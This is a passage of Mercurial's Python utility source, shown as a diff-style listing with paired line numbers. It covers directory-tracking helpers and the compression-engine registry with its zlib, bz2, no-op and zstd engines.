3264 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3262 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3265 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3263 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3266 By default it will flush stdout first.
3264 By default it will flush stdout first.
3267 It can be used everywhere and intentionally does not require an ui object.
3265 It can be used everywhere and intentionally does not require an ui object.
3268 Not be used in production code but very convenient while developing.
3266 Not be used in production code but very convenient while developing.
3269 '''
3267 '''
3270 if otherf:
3268 if otherf:
3271 otherf.flush()
3269 otherf.flush()
3272 f.write('%s at:\n' % msg.rstrip())
3270 f.write('%s at:\n' % msg.rstrip())
3273 for line in getstackframes(skip + 1, depth=depth):
3271 for line in getstackframes(skip + 1, depth=depth):
3274 f.write(line)
3272 f.write(line)
3275 f.flush()
3273 f.flush()
3276
3274
3277 class dirs(object):
3275 class dirs(object):
3278 '''a multiset of directory names from a dirstate or manifest'''
3276 '''a multiset of directory names from a dirstate or manifest'''
3279
3277
3280 def __init__(self, map, skip=None):
3278 def __init__(self, map, skip=None):
3281 self._dirs = {}
3279 self._dirs = {}
3282 addpath = self.addpath
3280 addpath = self.addpath
3283 if safehasattr(map, 'iteritems') and skip is not None:
3281 if safehasattr(map, 'iteritems') and skip is not None:
3284 for f, s in map.iteritems():
3282 for f, s in map.iteritems():
3285 if s[0] != skip:
3283 if s[0] != skip:
3286 addpath(f)
3284 addpath(f)
3287 else:
3285 else:
3288 for f in map:
3286 for f in map:
3289 addpath(f)
3287 addpath(f)
3290
3288
3291 def addpath(self, path):
3289 def addpath(self, path):
3292 dirs = self._dirs
3290 dirs = self._dirs
3293 for base in finddirs(path):
3291 for base in finddirs(path):
3294 if base in dirs:
3292 if base in dirs:
3295 dirs[base] += 1
3293 dirs[base] += 1
3296 return
3294 return
3297 dirs[base] = 1
3295 dirs[base] = 1
3298
3296
3299 def delpath(self, path):
3297 def delpath(self, path):
3300 dirs = self._dirs
3298 dirs = self._dirs
3301 for base in finddirs(path):
3299 for base in finddirs(path):
3302 if dirs[base] > 1:
3300 if dirs[base] > 1:
3303 dirs[base] -= 1
3301 dirs[base] -= 1
3304 return
3302 return
3305 del dirs[base]
3303 del dirs[base]
3306
3304
3307 def __iter__(self):
3305 def __iter__(self):
3308 return iter(self._dirs)
3306 return iter(self._dirs)
3309
3307
3310 def __contains__(self, d):
3308 def __contains__(self, d):
3311 return d in self._dirs
3309 return d in self._dirs
3312
3310
3313 if safehasattr(parsers, 'dirs'):
3311 if safehasattr(parsers, 'dirs'):
3314 dirs = parsers.dirs
3312 dirs = parsers.dirs
3315
3313
3316 def finddirs(path):
3314 def finddirs(path):
3317 pos = path.rfind('/')
3315 pos = path.rfind('/')
3318 while pos != -1:
3316 while pos != -1:
3319 yield path[:pos]
3317 yield path[:pos]
3320 pos = path.rfind('/', 0, pos)
3318 pos = path.rfind('/', 0, pos)
3321
3319
3322 # compression code
3320 # compression code
3323
3321
3324 SERVERROLE = 'server'
3322 SERVERROLE = 'server'
3325 CLIENTROLE = 'client'
3323 CLIENTROLE = 'client'
3326
3324
3327 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3325 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3328 (u'name', u'serverpriority',
3326 (u'name', u'serverpriority',
3329 u'clientpriority'))
3327 u'clientpriority'))
3330
3328
3331 class compressormanager(object):
3329 class compressormanager(object):
3332 """Holds registrations of various compression engines.
3330 """Holds registrations of various compression engines.
3333
3331
3334 This class essentially abstracts the differences between compression
3332 This class essentially abstracts the differences between compression
3335 engines to allow new compression formats to be added easily, possibly from
3333 engines to allow new compression formats to be added easily, possibly from
3336 extensions.
3334 extensions.
3337
3335
3338 Compressors are registered against the global instance by calling its
3336 Compressors are registered against the global instance by calling its
3339 ``register()`` method.
3337 ``register()`` method.
3340 """
3338 """
3341 def __init__(self):
3339 def __init__(self):
3342 self._engines = {}
3340 self._engines = {}
3343 # Bundle spec human name to engine name.
3341 # Bundle spec human name to engine name.
3344 self._bundlenames = {}
3342 self._bundlenames = {}
3345 # Internal bundle identifier to engine name.
3343 # Internal bundle identifier to engine name.
3346 self._bundletypes = {}
3344 self._bundletypes = {}
3347 # Revlog header to engine name.
3345 # Revlog header to engine name.
3348 self._revlogheaders = {}
3346 self._revlogheaders = {}
3349 # Wire proto identifier to engine name.
3347 # Wire proto identifier to engine name.
3350 self._wiretypes = {}
3348 self._wiretypes = {}
3351
3349
3352 def __getitem__(self, key):
3350 def __getitem__(self, key):
3353 return self._engines[key]
3351 return self._engines[key]
3354
3352
3355 def __contains__(self, key):
3353 def __contains__(self, key):
3356 return key in self._engines
3354 return key in self._engines
3357
3355
3358 def __iter__(self):
3356 def __iter__(self):
3359 return iter(self._engines.keys())
3357 return iter(self._engines.keys())
3360
3358
3361 def register(self, engine):
3359 def register(self, engine):
3362 """Register a compression engine with the manager.
3360 """Register a compression engine with the manager.
3363
3361
3364 The argument must be a ``compressionengine`` instance.
3362 The argument must be a ``compressionengine`` instance.
3365 """
3363 """
3366 if not isinstance(engine, compressionengine):
3364 if not isinstance(engine, compressionengine):
3367 raise ValueError(_('argument must be a compressionengine'))
3365 raise ValueError(_('argument must be a compressionengine'))
3368
3366
3369 name = engine.name()
3367 name = engine.name()
3370
3368
3371 if name in self._engines:
3369 if name in self._engines:
3372 raise error.Abort(_('compression engine %s already registered') %
3370 raise error.Abort(_('compression engine %s already registered') %
3373 name)
3371 name)
3374
3372
3375 bundleinfo = engine.bundletype()
3373 bundleinfo = engine.bundletype()
3376 if bundleinfo:
3374 if bundleinfo:
3377 bundlename, bundletype = bundleinfo
3375 bundlename, bundletype = bundleinfo
3378
3376
3379 if bundlename in self._bundlenames:
3377 if bundlename in self._bundlenames:
3380 raise error.Abort(_('bundle name %s already registered') %
3378 raise error.Abort(_('bundle name %s already registered') %
3381 bundlename)
3379 bundlename)
3382 if bundletype in self._bundletypes:
3380 if bundletype in self._bundletypes:
3383 raise error.Abort(_('bundle type %s already registered by %s') %
3381 raise error.Abort(_('bundle type %s already registered by %s') %
3384 (bundletype, self._bundletypes[bundletype]))
3382 (bundletype, self._bundletypes[bundletype]))
3385
3383
3386 # No external facing name declared.
3384 # No external facing name declared.
3387 if bundlename:
3385 if bundlename:
3388 self._bundlenames[bundlename] = name
3386 self._bundlenames[bundlename] = name
3389
3387
3390 self._bundletypes[bundletype] = name
3388 self._bundletypes[bundletype] = name
3391
3389
3392 wiresupport = engine.wireprotosupport()
3390 wiresupport = engine.wireprotosupport()
3393 if wiresupport:
3391 if wiresupport:
3394 wiretype = wiresupport.name
3392 wiretype = wiresupport.name
3395 if wiretype in self._wiretypes:
3393 if wiretype in self._wiretypes:
3396 raise error.Abort(_('wire protocol compression %s already '
3394 raise error.Abort(_('wire protocol compression %s already '
3397 'registered by %s') %
3395 'registered by %s') %
3398 (wiretype, self._wiretypes[wiretype]))
3396 (wiretype, self._wiretypes[wiretype]))
3399
3397
3400 self._wiretypes[wiretype] = name
3398 self._wiretypes[wiretype] = name
3401
3399
3402 revlogheader = engine.revlogheader()
3400 revlogheader = engine.revlogheader()
3403 if revlogheader and revlogheader in self._revlogheaders:
3401 if revlogheader and revlogheader in self._revlogheaders:
3404 raise error.Abort(_('revlog header %s already registered by %s') %
3402 raise error.Abort(_('revlog header %s already registered by %s') %
3405 (revlogheader, self._revlogheaders[revlogheader]))
3403 (revlogheader, self._revlogheaders[revlogheader]))
3406
3404
3407 if revlogheader:
3405 if revlogheader:
3408 self._revlogheaders[revlogheader] = name
3406 self._revlogheaders[revlogheader] = name
3409
3407
3410 self._engines[name] = engine
3408 self._engines[name] = engine
3411
3409
3412 @property
3410 @property
3413 def supportedbundlenames(self):
3411 def supportedbundlenames(self):
3414 return set(self._bundlenames.keys())
3412 return set(self._bundlenames.keys())
3415
3413
3416 @property
3414 @property
3417 def supportedbundletypes(self):
3415 def supportedbundletypes(self):
3418 return set(self._bundletypes.keys())
3416 return set(self._bundletypes.keys())
3419
3417
3420 def forbundlename(self, bundlename):
3418 def forbundlename(self, bundlename):
3421 """Obtain a compression engine registered to a bundle name.
3419 """Obtain a compression engine registered to a bundle name.
3422
3420
3423 Will raise KeyError if the bundle type isn't registered.
3421 Will raise KeyError if the bundle type isn't registered.
3424
3422
3425 Will abort if the engine is known but not available.
3423 Will abort if the engine is known but not available.
3426 """
3424 """
3427 engine = self._engines[self._bundlenames[bundlename]]
3425 engine = self._engines[self._bundlenames[bundlename]]
3428 if not engine.available():
3426 if not engine.available():
3429 raise error.Abort(_('compression engine %s could not be loaded') %
3427 raise error.Abort(_('compression engine %s could not be loaded') %
3430 engine.name())
3428 engine.name())
3431 return engine
3429 return engine
3432
3430
3433 def forbundletype(self, bundletype):
3431 def forbundletype(self, bundletype):
3434 """Obtain a compression engine registered to a bundle type.
3432 """Obtain a compression engine registered to a bundle type.
3435
3433
3436 Will raise KeyError if the bundle type isn't registered.
3434 Will raise KeyError if the bundle type isn't registered.
3437
3435
3438 Will abort if the engine is known but not available.
3436 Will abort if the engine is known but not available.
3439 """
3437 """
3440 engine = self._engines[self._bundletypes[bundletype]]
3438 engine = self._engines[self._bundletypes[bundletype]]
3441 if not engine.available():
3439 if not engine.available():
3442 raise error.Abort(_('compression engine %s could not be loaded') %
3440 raise error.Abort(_('compression engine %s could not be loaded') %
3443 engine.name())
3441 engine.name())
3444 return engine
3442 return engine
3445
3443
3446 def supportedwireengines(self, role, onlyavailable=True):
3444 def supportedwireengines(self, role, onlyavailable=True):
3447 """Obtain compression engines that support the wire protocol.
3445 """Obtain compression engines that support the wire protocol.
3448
3446
3449 Returns a list of engines in prioritized order, most desired first.
3447 Returns a list of engines in prioritized order, most desired first.
3450
3448
3451 If ``onlyavailable`` is set, filter out engines that can't be
3449 If ``onlyavailable`` is set, filter out engines that can't be
3452 loaded.
3450 loaded.
3453 """
3451 """
3454 assert role in (SERVERROLE, CLIENTROLE)
3452 assert role in (SERVERROLE, CLIENTROLE)
3455
3453
3456 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3454 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3457
3455
3458 engines = [self._engines[e] for e in self._wiretypes.values()]
3456 engines = [self._engines[e] for e in self._wiretypes.values()]
3459 if onlyavailable:
3457 if onlyavailable:
3460 engines = [e for e in engines if e.available()]
3458 engines = [e for e in engines if e.available()]
3461
3459
3462 def getkey(e):
3460 def getkey(e):
3463 # Sort first by priority, highest first. In case of tie, sort
3461 # Sort first by priority, highest first. In case of tie, sort
3464 # alphabetically. This is arbitrary, but ensures output is
3462 # alphabetically. This is arbitrary, but ensures output is
3465 # stable.
3463 # stable.
3466 w = e.wireprotosupport()
3464 w = e.wireprotosupport()
3467 return -1 * getattr(w, attr), w.name
3465 return -1 * getattr(w, attr), w.name
3468
3466
3469 return list(sorted(engines, key=getkey))
3467 return list(sorted(engines, key=getkey))
3470
3468
3471 def forwiretype(self, wiretype):
3469 def forwiretype(self, wiretype):
3472 engine = self._engines[self._wiretypes[wiretype]]
3470 engine = self._engines[self._wiretypes[wiretype]]
3473 if not engine.available():
3471 if not engine.available():
3474 raise error.Abort(_('compression engine %s could not be loaded') %
3472 raise error.Abort(_('compression engine %s could not be loaded') %
3475 engine.name())
3473 engine.name())
3476 return engine
3474 return engine
3477
3475
3478 def forrevlogheader(self, header):
3476 def forrevlogheader(self, header):
3479 """Obtain a compression engine registered to a revlog header.
3477 """Obtain a compression engine registered to a revlog header.
3480
3478
3481 Will raise KeyError if the revlog header value isn't registered.
3479 Will raise KeyError if the revlog header value isn't registered.
3482 """
3480 """
3483 return self._engines[self._revlogheaders[header]]
3481 return self._engines[self._revlogheaders[header]]
3484
3482
3485 compengines = compressormanager()
3483 compengines = compressormanager()
3486
3484
3487 class compressionengine(object):
3485 class compressionengine(object):
3488 """Base class for compression engines.
3486 """Base class for compression engines.
3489
3487
3490 Compression engines must implement the interface defined by this class.
3488 Compression engines must implement the interface defined by this class.
3491 """
3489 """
3492 def name(self):
3490 def name(self):
3493 """Returns the name of the compression engine.
3491 """Returns the name of the compression engine.
3494
3492
3495 This is the key the engine is registered under.
3493 This is the key the engine is registered under.
3496
3494
3497 This method must be implemented.
3495 This method must be implemented.
3498 """
3496 """
3499 raise NotImplementedError()
3497 raise NotImplementedError()
3500
3498
3501 def available(self):
3499 def available(self):
3502 """Whether the compression engine is available.
3500 """Whether the compression engine is available.
3503
3501
3504 The intent of this method is to allow optional compression engines
3502 The intent of this method is to allow optional compression engines
3505 that may not be available in all installations (such as engines relying
3503 that may not be available in all installations (such as engines relying
3506 on C extensions that may not be present).
3504 on C extensions that may not be present).
3507 """
3505 """
3508 return True
3506 return True
3509
3507
3510 def bundletype(self):
3508 def bundletype(self):
3511 """Describes bundle identifiers for this engine.
3509 """Describes bundle identifiers for this engine.
3512
3510
3513 If this compression engine isn't supported for bundles, returns None.
3511 If this compression engine isn't supported for bundles, returns None.
3514
3512
3515 If this engine can be used for bundles, returns a 2-tuple of strings of
3513 If this engine can be used for bundles, returns a 2-tuple of strings of
3516 the user-facing "bundle spec" compression name and an internal
3514 the user-facing "bundle spec" compression name and an internal
3517 identifier used to denote the compression format within bundles. To
3515 identifier used to denote the compression format within bundles. To
3518 exclude the name from external usage, set the first element to ``None``.
3516 exclude the name from external usage, set the first element to ``None``.
3519
3517
3520 If bundle compression is supported, the class must also implement
3518 If bundle compression is supported, the class must also implement
3521 ``compressstream`` and `decompressorreader``.
3519 ``compressstream`` and `decompressorreader``.
3522
3520
3523 The docstring of this method is used in the help system to tell users
3521 The docstring of this method is used in the help system to tell users
3524 about this engine.
3522 about this engine.
3525 """
3523 """
3526 return None
3524 return None
3527
3525
3528 def wireprotosupport(self):
3526 def wireprotosupport(self):
3529 """Declare support for this compression format on the wire protocol.
3527 """Declare support for this compression format on the wire protocol.
3530
3528
3531 If this compression engine isn't supported for compressing wire
3529 If this compression engine isn't supported for compressing wire
3532 protocol payloads, returns None.
3530 protocol payloads, returns None.
3533
3531
3534 Otherwise, returns ``compenginewireprotosupport`` with the following
3532 Otherwise, returns ``compenginewireprotosupport`` with the following
3535 fields:
3533 fields:
3536
3534
3537 * String format identifier
3535 * String format identifier
3538 * Integer priority for the server
3536 * Integer priority for the server
3539 * Integer priority for the client
3537 * Integer priority for the client
3540
3538
3541 The integer priorities are used to order the advertisement of format
3539 The integer priorities are used to order the advertisement of format
3542 support by server and client. The highest integer is advertised
3540 support by server and client. The highest integer is advertised
3543 first. Integers with non-positive values aren't advertised.
3541 first. Integers with non-positive values aren't advertised.
3544
3542
3545 The priority values are somewhat arbitrary and only used for default
3543 The priority values are somewhat arbitrary and only used for default
3546 ordering. The relative order can be changed via config options.
3544 ordering. The relative order can be changed via config options.
3547
3545
3548 If wire protocol compression is supported, the class must also implement
3546 If wire protocol compression is supported, the class must also implement
3549 ``compressstream`` and ``decompressorreader``.
3547 ``compressstream`` and ``decompressorreader``.
3550 """
3548 """
3551 return None
3549 return None
3552
3550
3553 def revlogheader(self):
3551 def revlogheader(self):
3554 """Header added to revlog chunks that identifies this engine.
3552 """Header added to revlog chunks that identifies this engine.
3555
3553
3556 If this engine can be used to compress revlogs, this method should
3554 If this engine can be used to compress revlogs, this method should
3557 return the bytes used to identify chunks compressed with this engine.
3555 return the bytes used to identify chunks compressed with this engine.
3558 Else, the method should return ``None`` to indicate it does not
3556 Else, the method should return ``None`` to indicate it does not
3559 participate in revlog compression.
3557 participate in revlog compression.
3560 """
3558 """
3561 return None
3559 return None
3562
3560
3563 def compressstream(self, it, opts=None):
3561 def compressstream(self, it, opts=None):
3564 """Compress an iterator of chunks.
3562 """Compress an iterator of chunks.
3565
3563
3566 The method receives an iterator (ideally a generator) of chunks of
3564 The method receives an iterator (ideally a generator) of chunks of
3567 bytes to be compressed. It returns an iterator (ideally a generator)
3565 bytes to be compressed. It returns an iterator (ideally a generator)
3568 of bytes of chunks representing the compressed output.
3566 of bytes of chunks representing the compressed output.
3569
3567
3570 Optionally accepts an argument defining how to perform compression.
3568 Optionally accepts an argument defining how to perform compression.
3571 Each engine treats this argument differently.
3569 Each engine treats this argument differently.
3572 """
3570 """
3573 raise NotImplementedError()
3571 raise NotImplementedError()
3574
3572
3575 def decompressorreader(self, fh):
3573 def decompressorreader(self, fh):
3576 """Perform decompression on a file object.
3574 """Perform decompression on a file object.
3577
3575
3578 Argument is an object with a ``read(size)`` method that returns
3576 Argument is an object with a ``read(size)`` method that returns
3579 compressed data. Return value is an object with a ``read(size)`` that
3577 compressed data. Return value is an object with a ``read(size)`` that
3580 returns uncompressed data.
3578 returns uncompressed data.
3581 """
3579 """
3582 raise NotImplementedError()
3580 raise NotImplementedError()
3583
3581
3584 def revlogcompressor(self, opts=None):
3582 def revlogcompressor(self, opts=None):
3585 """Obtain an object that can be used to compress revlog entries.
3583 """Obtain an object that can be used to compress revlog entries.
3586
3584
3587 The object has a ``compress(data)`` method that compresses binary
3585 The object has a ``compress(data)`` method that compresses binary
3588 data. This method returns compressed binary data or ``None`` if
3586 data. This method returns compressed binary data or ``None`` if
3589 the data could not be compressed (too small, not compressible, etc).
3587 the data could not be compressed (too small, not compressible, etc).
3590 The returned data should have a header uniquely identifying this
3588 The returned data should have a header uniquely identifying this
3591 compression format so decompression can be routed to this engine.
3589 compression format so decompression can be routed to this engine.
3592 This header should be identified by the ``revlogheader()`` return
3590 This header should be identified by the ``revlogheader()`` return
3593 value.
3591 value.
3594
3592
3595 The object has a ``decompress(data)`` method that decompresses
3593 The object has a ``decompress(data)`` method that decompresses
3596 data. The method will only be called if ``data`` begins with
3594 data. The method will only be called if ``data`` begins with
3597 ``revlogheader()``. The method should return the raw, uncompressed
3595 ``revlogheader()``. The method should return the raw, uncompressed
3598 data or raise a ``RevlogError``.
3596 data or raise a ``RevlogError``.
3599
3597
3600 The object is reusable but is not thread safe.
3598 The object is reusable but is not thread safe.
3601 """
3599 """
3602 raise NotImplementedError()
3600 raise NotImplementedError()
3603
3601
3604 class _zlibengine(compressionengine):
3602 class _zlibengine(compressionengine):
3605 def name(self):
3603 def name(self):
3606 return 'zlib'
3604 return 'zlib'
3607
3605
3608 def bundletype(self):
3606 def bundletype(self):
3609 """zlib compression using the DEFLATE algorithm.
3607 """zlib compression using the DEFLATE algorithm.
3610
3608
3611 All Mercurial clients should support this format. The compression
3609 All Mercurial clients should support this format. The compression
3612 algorithm strikes a reasonable balance between compression ratio
3610 algorithm strikes a reasonable balance between compression ratio
3613 and size.
3611 and size.
3614 """
3612 """
3615 return 'gzip', 'GZ'
3613 return 'gzip', 'GZ'
3616
3614
3617 def wireprotosupport(self):
3615 def wireprotosupport(self):
3618 return compewireprotosupport('zlib', 20, 20)
3616 return compewireprotosupport('zlib', 20, 20)
3619
3617
3620 def revlogheader(self):
3618 def revlogheader(self):
3621 return 'x'
3619 return 'x'
3622
3620
3623 def compressstream(self, it, opts=None):
3621 def compressstream(self, it, opts=None):
3624 opts = opts or {}
3622 opts = opts or {}
3625
3623
3626 z = zlib.compressobj(opts.get('level', -1))
3624 z = zlib.compressobj(opts.get('level', -1))
3627 for chunk in it:
3625 for chunk in it:
3628 data = z.compress(chunk)
3626 data = z.compress(chunk)
3629 # Not all calls to compress emit data. It is cheaper to inspect
3627 # Not all calls to compress emit data. It is cheaper to inspect
3630 # here than to feed empty chunks through generator.
3628 # here than to feed empty chunks through generator.
3631 if data:
3629 if data:
3632 yield data
3630 yield data
3633
3631
3634 yield z.flush()
3632 yield z.flush()
3635
3633
3636 def decompressorreader(self, fh):
3634 def decompressorreader(self, fh):
3637 def gen():
3635 def gen():
3638 d = zlib.decompressobj()
3636 d = zlib.decompressobj()
3639 for chunk in filechunkiter(fh):
3637 for chunk in filechunkiter(fh):
3640 while chunk:
3638 while chunk:
3641 # Limit output size to limit memory.
3639 # Limit output size to limit memory.
3642 yield d.decompress(chunk, 2 ** 18)
3640 yield d.decompress(chunk, 2 ** 18)
3643 chunk = d.unconsumed_tail
3641 chunk = d.unconsumed_tail
3644
3642
3645 return chunkbuffer(gen())
3643 return chunkbuffer(gen())
3646
3644
3647 class zlibrevlogcompressor(object):
3645 class zlibrevlogcompressor(object):
3648 def compress(self, data):
3646 def compress(self, data):
3649 insize = len(data)
3647 insize = len(data)
3650 # Caller handles empty input case.
3648 # Caller handles empty input case.
3651 assert insize > 0
3649 assert insize > 0
3652
3650
3653 if insize < 44:
3651 if insize < 44:
3654 return None
3652 return None
3655
3653
3656 elif insize <= 1000000:
3654 elif insize <= 1000000:
3657 compressed = zlib.compress(data)
3655 compressed = zlib.compress(data)
3658 if len(compressed) < insize:
3656 if len(compressed) < insize:
3659 return compressed
3657 return compressed
3660 return None
3658 return None
3661
3659
3662 # zlib makes an internal copy of the input buffer, doubling
3660 # zlib makes an internal copy of the input buffer, doubling
3663 # memory usage for large inputs. So do streaming compression
3661 # memory usage for large inputs. So do streaming compression
3664 # on large inputs.
3662 # on large inputs.
3665 else:
3663 else:
3666 z = zlib.compressobj()
3664 z = zlib.compressobj()
3667 parts = []
3665 parts = []
3668 pos = 0
3666 pos = 0
3669 while pos < insize:
3667 while pos < insize:
3670 pos2 = pos + 2**20
3668 pos2 = pos + 2**20
3671 parts.append(z.compress(data[pos:pos2]))
3669 parts.append(z.compress(data[pos:pos2]))
3672 pos = pos2
3670 pos = pos2
3673 parts.append(z.flush())
3671 parts.append(z.flush())
3674
3672
3675 if sum(map(len, parts)) < insize:
3673 if sum(map(len, parts)) < insize:
3676 return ''.join(parts)
3674 return ''.join(parts)
3677 return None
3675 return None
3678
3676
3679 def decompress(self, data):
3677 def decompress(self, data):
3680 try:
3678 try:
3681 return zlib.decompress(data)
3679 return zlib.decompress(data)
3682 except zlib.error as e:
3680 except zlib.error as e:
3683 raise error.RevlogError(_('revlog decompress error: %s') %
3681 raise error.RevlogError(_('revlog decompress error: %s') %
3684 stringutil.forcebytestr(e))
3682 stringutil.forcebytestr(e))
3685
3683
3686 def revlogcompressor(self, opts=None):
3684 def revlogcompressor(self, opts=None):
3687 return self.zlibrevlogcompressor()
3685 return self.zlibrevlogcompressor()
3688
3686
3689 compengines.register(_zlibengine())
3687 compengines.register(_zlibengine())
3690
3688
3691 class _bz2engine(compressionengine):
3689 class _bz2engine(compressionengine):
3692 def name(self):
3690 def name(self):
3693 return 'bz2'
3691 return 'bz2'
3694
3692
3695 def bundletype(self):
3693 def bundletype(self):
3696 """An algorithm that produces smaller bundles than ``gzip``.
3694 """An algorithm that produces smaller bundles than ``gzip``.
3697
3695
3698 All Mercurial clients should support this format.
3696 All Mercurial clients should support this format.
3699
3697
3700 This engine will likely produce smaller bundles than ``gzip`` but
3698 This engine will likely produce smaller bundles than ``gzip`` but
3701 will be significantly slower, both during compression and
3699 will be significantly slower, both during compression and
3702 decompression.
3700 decompression.
3703
3701
3704 If available, the ``zstd`` engine can yield similar or better
3702 If available, the ``zstd`` engine can yield similar or better
3705 compression at much higher speeds.
3703 compression at much higher speeds.
3706 """
3704 """
3707 return 'bzip2', 'BZ'
3705 return 'bzip2', 'BZ'
3708
3706
3709 # We declare a protocol name but don't advertise by default because
3707 # We declare a protocol name but don't advertise by default because
3710 # it is slow.
3708 # it is slow.
3711 def wireprotosupport(self):
3709 def wireprotosupport(self):
3712 return compewireprotosupport('bzip2', 0, 0)
3710 return compewireprotosupport('bzip2', 0, 0)
3713
3711
3714 def compressstream(self, it, opts=None):
3712 def compressstream(self, it, opts=None):
3715 opts = opts or {}
3713 opts = opts or {}
3716 z = bz2.BZ2Compressor(opts.get('level', 9))
3714 z = bz2.BZ2Compressor(opts.get('level', 9))
3717 for chunk in it:
3715 for chunk in it:
3718 data = z.compress(chunk)
3716 data = z.compress(chunk)
3719 if data:
3717 if data:
3720 yield data
3718 yield data
3721
3719
3722 yield z.flush()
3720 yield z.flush()
3723
3721
3724 def decompressorreader(self, fh):
3722 def decompressorreader(self, fh):
3725 def gen():
3723 def gen():
3726 d = bz2.BZ2Decompressor()
3724 d = bz2.BZ2Decompressor()
3727 for chunk in filechunkiter(fh):
3725 for chunk in filechunkiter(fh):
3728 yield d.decompress(chunk)
3726 yield d.decompress(chunk)
3729
3727
3730 return chunkbuffer(gen())
3728 return chunkbuffer(gen())
3731
3729
3732 compengines.register(_bz2engine())
3730 compengines.register(_bz2engine())
3733
3731
3734 class _truncatedbz2engine(compressionengine):
3732 class _truncatedbz2engine(compressionengine):
3735 def name(self):
3733 def name(self):
3736 return 'bz2truncated'
3734 return 'bz2truncated'
3737
3735
3738 def bundletype(self):
3736 def bundletype(self):
3739 return None, '_truncatedBZ'
3737 return None, '_truncatedBZ'
3740
3738
3741 # We don't implement compressstream because it is hackily handled elsewhere.
3739 # We don't implement compressstream because it is hackily handled elsewhere.
3742
3740
3743 def decompressorreader(self, fh):
3741 def decompressorreader(self, fh):
3744 def gen():
3742 def gen():
3745 # The input stream doesn't have the 'BZ' header. So add it back.
3743 # The input stream doesn't have the 'BZ' header. So add it back.
3746 d = bz2.BZ2Decompressor()
3744 d = bz2.BZ2Decompressor()
3747 d.decompress('BZ')
3745 d.decompress('BZ')
3748 for chunk in filechunkiter(fh):
3746 for chunk in filechunkiter(fh):
3749 yield d.decompress(chunk)
3747 yield d.decompress(chunk)
3750
3748
3751 return chunkbuffer(gen())
3749 return chunkbuffer(gen())
3752
3750
3753 compengines.register(_truncatedbz2engine())
3751 compengines.register(_truncatedbz2engine())
3754
3752
3755 class _noopengine(compressionengine):
3753 class _noopengine(compressionengine):
3756 def name(self):
3754 def name(self):
3757 return 'none'
3755 return 'none'
3758
3756
3759 def bundletype(self):
3757 def bundletype(self):
3760 """No compression is performed.
3758 """No compression is performed.
3761
3759
3762 Use this compression engine to explicitly disable compression.
3760 Use this compression engine to explicitly disable compression.
3763 """
3761 """
3764 return 'none', 'UN'
3762 return 'none', 'UN'
3765
3763
3766 # Clients always support uncompressed payloads. Servers don't because
3764 # Clients always support uncompressed payloads. Servers don't because
3767 # unless you are on a fast network, uncompressed payloads can easily
3765 # unless you are on a fast network, uncompressed payloads can easily
3768 # saturate your network pipe.
3766 # saturate your network pipe.
3769 def wireprotosupport(self):
3767 def wireprotosupport(self):
3770 return compewireprotosupport('none', 0, 10)
3768 return compewireprotosupport('none', 0, 10)
3771
3769
3772 # We don't implement revlogheader because it is handled specially
3770 # We don't implement revlogheader because it is handled specially
3773 # in the revlog class.
3771 # in the revlog class.
3774
3772
3775 def compressstream(self, it, opts=None):
3773 def compressstream(self, it, opts=None):
3776 return it
3774 return it
3777
3775
3778 def decompressorreader(self, fh):
3776 def decompressorreader(self, fh):
3779 return fh
3777 return fh
3780
3778
3781 class nooprevlogcompressor(object):
3779 class nooprevlogcompressor(object):
3782 def compress(self, data):
3780 def compress(self, data):
3783 return None
3781 return None
3784
3782
3785 def revlogcompressor(self, opts=None):
3783 def revlogcompressor(self, opts=None):
3786 return self.nooprevlogcompressor()
3784 return self.nooprevlogcompressor()
3787
3785
3788 compengines.register(_noopengine())
3786 compengines.register(_noopengine())
3789
3787
3790 class _zstdengine(compressionengine):
3788 class _zstdengine(compressionengine):
3791 def name(self):
3789 def name(self):
3792 return 'zstd'
3790 return 'zstd'
3793
3791
3794 @propertycache
3792 @propertycache
3795 def _module(self):
3793 def _module(self):
3796 # Not all installs have the zstd module available. So defer importing
3794 # Not all installs have the zstd module available. So defer importing
3797 # until first access.
3795 # until first access.
3798 try:
3796 try:
3799 from . import zstd
3797 from . import zstd
3800 # Force delayed import.
3798 # Force delayed import.
3801 zstd.__version__
3799 zstd.__version__
3802 return zstd
3800 return zstd
3803 except ImportError:
3801 except ImportError:
3804 return None
3802 return None
3805
3803
3806 def available(self):
3804 def available(self):
3807 return bool(self._module)
3805 return bool(self._module)
3808
3806
3809 def bundletype(self):
3807 def bundletype(self):
3810 """A modern compression algorithm that is fast and highly flexible.
3808 """A modern compression algorithm that is fast and highly flexible.
3811
3809
3812 Only supported by Mercurial 4.1 and newer clients.
3810 Only supported by Mercurial 4.1 and newer clients.
3813
3811
3814 With the default settings, zstd compression is both faster and yields
3812 With the default settings, zstd compression is both faster and yields
3815 better compression than ``gzip``. It also frequently yields better
3813 better compression than ``gzip``. It also frequently yields better
3816 compression than ``bzip2`` while operating at much higher speeds.
3814 compression than ``bzip2`` while operating at much higher speeds.
3817
3815
3818 If this engine is available and backwards compatibility is not a
3816 If this engine is available and backwards compatibility is not a
3819 concern, it is likely the best available engine.
3817 concern, it is likely the best available engine.
3820 """
3818 """
3821 return 'zstd', 'ZS'
3819 return 'zstd', 'ZS'
3822
3820
3823 def wireprotosupport(self):
3821 def wireprotosupport(self):
3824 return compewireprotosupport('zstd', 50, 50)
3822 return compewireprotosupport('zstd', 50, 50)
3825
3823
3826 def revlogheader(self):
3824 def revlogheader(self):
3827 return '\x28'
3825 return '\x28'
3828
3826
3829 def compressstream(self, it, opts=None):
3827 def compressstream(self, it, opts=None):
3830 opts = opts or {}
3828 opts = opts or {}
3831 # zstd level 3 is almost always significantly faster than zlib
3829 # zstd level 3 is almost always significantly faster than zlib
3832 # while providing no worse compression. It strikes a good balance
3830 # while providing no worse compression. It strikes a good balance
3833 # between speed and compression.
3831 # between speed and compression.
3834 level = opts.get('level', 3)
3832 level = opts.get('level', 3)
3835
3833
3836 zstd = self._module
3834 zstd = self._module
3837 z = zstd.ZstdCompressor(level=level).compressobj()
3835 z = zstd.ZstdCompressor(level=level).compressobj()
3838 for chunk in it:
3836 for chunk in it:
3839 data = z.compress(chunk)
3837 data = z.compress(chunk)
3840 if data:
3838 if data:
3841 yield data
3839 yield data
3842
3840
3843 yield z.flush()
3841 yield z.flush()
3844
3842
3845 def decompressorreader(self, fh):
